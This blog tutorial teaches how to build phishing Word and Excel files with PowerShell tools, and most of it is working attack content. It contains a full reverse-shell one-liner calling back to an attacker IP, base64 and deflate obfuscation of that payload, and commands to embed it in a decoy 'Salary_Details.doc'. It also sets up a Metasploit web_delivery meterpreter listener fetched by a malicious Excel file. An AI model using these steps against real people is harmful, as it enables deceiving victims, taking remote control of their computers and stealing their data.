Use Powershell for effective phishing

by do son · Published May 18, 2017 · Updated November 4, 2024

Introduction

Windows PowerShell is a command-line shell for Microsoft Windows that is used for system administration. It uses cmdlets (commandlets) that are .NET classes to perform administrative tasks, and can access COM and WMI for local and remote administration. PowerShell can also be embedded within applications to make use of its abilities. PowerShell originated in 2006 when Monad (Microsoft Shell) was renamed to Windows PowerShell.

Making Microsoft Word phishing files

Download powercat (netshell features all in version 2 powershell)

Load powercat

PS G:\github\Pentest\powershell\powercat-master> . .\powercat.ps1

PS G:\github\Pentest\powershell\powercat-master> powercat

You must select either client mode (-c) or listen mode (-l).

After loading the use of powercat to open the monitor:

PS G:\github\Pentest\powershell\powercat-master> powercat -l -v -p 4444

Verbose: Set Stream 1: TCP

Verbose: Set Stream 2: Console

Verbose: Setting up Stream 1...

Verbose: Listening on [0.0.0.0] (port 4444)

Test to load Invoke-PowerShellTcp and execute:

PS G:\github\Pentest\powershell\nishang-master\Shells> . .\Invoke-PowerShellTcp.ps1

PS G:\github\Pentest\powershell\nishang-master\Shells> Invoke-PowerShellTcp -Reverse -IPAddress 127.0.0.1 -Port 4444

Can be found directly to get a powerhell shell. The following production of word files. Copy nishang in the Invoke-PowerShellTcpOneLine.ps1 client code, as follows:

$client = New-Object System.Net.Sockets.TCPClient("192.168.52.129",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = (::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Use Invoke-Encode.ps1 to encode, before encoding to remember to modify the ip and their own to monitor the port

PS G:\github\Pentest\powershell\nishang-master\Shells> cd ..\Utility\

PS G:\github\Pentest\powershell\nishang-master\Utility> . .\Invoke-Encode.ps1

PS G:\github\Pentest\powershell\nishang-master\Utility> Invoke-Encode -DataToEncode '$client = New-Object System.Net.Sockets.TCPClient("192.1

68.52.129",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$da

ta = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendb

ack + "PS " + (pwd).Path + "> ";$sendbyte = (::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream

.Flush()};$client.Close()' -IsString -PostScriptCommand

Encoded data written to .\encoded.txt

Encoded command written to .\encodedcommand.txt

Copy the encoded code and the code is as follows:

Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('TVHNasJAEL4X+g5DSMsuNUtMG6mGCm1oi1CiNEIP4mFNBpMao5gRFfXdu5uY1L3MMHx/M2tGWYo5wQsEuLOGs1+MCMJDQbgUAZIIV9ECqRBjf+SXSGa0u45od56Fq4rTNVpP6nHPLGiDcqmEzEpSfCKF5YxxbzI7EE6mU1PXQoFsITqu++ie7o722dslaYaMmammV0LiG2XMKnwL7BZUrfjCfE4J52DlCDY/emYsSSoeu1rAGh/WGMgl1quMcU/iNfQHg/c8WsVpPueXfKqtXbRJqjfBPJ7JaKFFU9xD5eD079twguGWrIoGV1AHyuQ18QGMUQiGqmy9i7kYSUr0sA/GhaMMtfyEdDC8ZJr2emXGMtubzsT+HZoTi59NSsgaHZW76evzNNiPbFskjJ+9+lf8bFUg47c3fw==')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();

Load Out-Word.ps1 and generate the back door, here should pay attention to the payload inside the single quotation marks plus a single quotation mark!

PS G:\github\Pentest\powershell\nishang-master\Utility> . ..\Client\Out-Word.ps1

PS G:\github\Pentest\powershell\nishang-master\Utility> Out-Word -Payload 'powershell -c Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(''TVHNasJAEL4X+g5DSMsuNUtMG6mGCm1oi1CiNEIP4mFNBpMao5gRFfXdu5uY1L3MMHx/M2tGWYo5wQsEuLOGs1+MCMJDQbgUAZIIV9ECqRBjf+SXSGa0u45od56Fq4rTNVpP6nHPLGiDcqmEzEpSfCKF5YxxbzI7EE6mU1PXQoFsITqu++ie7o722dslaYaMmammV0LiG2XMKnwL7BZUrfjCfE4J52DlCDY/emYsSSoeu1rAGh/WGMgl1quMcU/iNfQHg/c8WsVpPueXfKqtXbRJqjfBPJ7JaKFFU9xD5eD079twguGWrIoGV1AHyuQ18QGMUQiGqmy9i7kYSUr0sA/GhaMMtfyEdDC8ZJr2emXGMtubzsT+HZoTi59NSsgaHZW76evzNNiPbFskjJ+9+lf8bFUg47c3fw=='')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();'

Saved to file G:\github\Pentest\powershell\nishang-master\Utility\Salary_Details.doc

0

PS G:\github\Pentest\powershell\nishang-master\Utility>

After the implementation of the word, it will rebound shell.

Getting the rally of the powershell can be easily upgraded to the metaploit meterpreter.

Making Microsoft Excel phishing files

First use msf web_delivery to open a powershell monitor:

msf > use exploit/multi/script/web_delivery 

msf exploit(web_delivery) > set target 2

target => 2

msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(web_delivery) > set LHOST 192.168.52.129

LHOST => 192.168.52.129

msf exploit(web_delivery) > set URIPATH /

URIPATH => 

msf exploit(web_delivery) > exploit

Use Out-Excel.ps1 to make excel phishing files:

PS D:\temp> . .\Out-Excel.ps1

PS D:\temp> Out-Excel -PayloadURL http://192.168.52.129:8080/ -OutputFile  D:\temp\test.xls

Saved to file D:\temp\test.xls

http://192.168.52.129:8080 address is msf open service address. Run excel, get the meterpreter session as shown below:

Use Powershell for effective phishing

Search

Brilliantly

Content & Links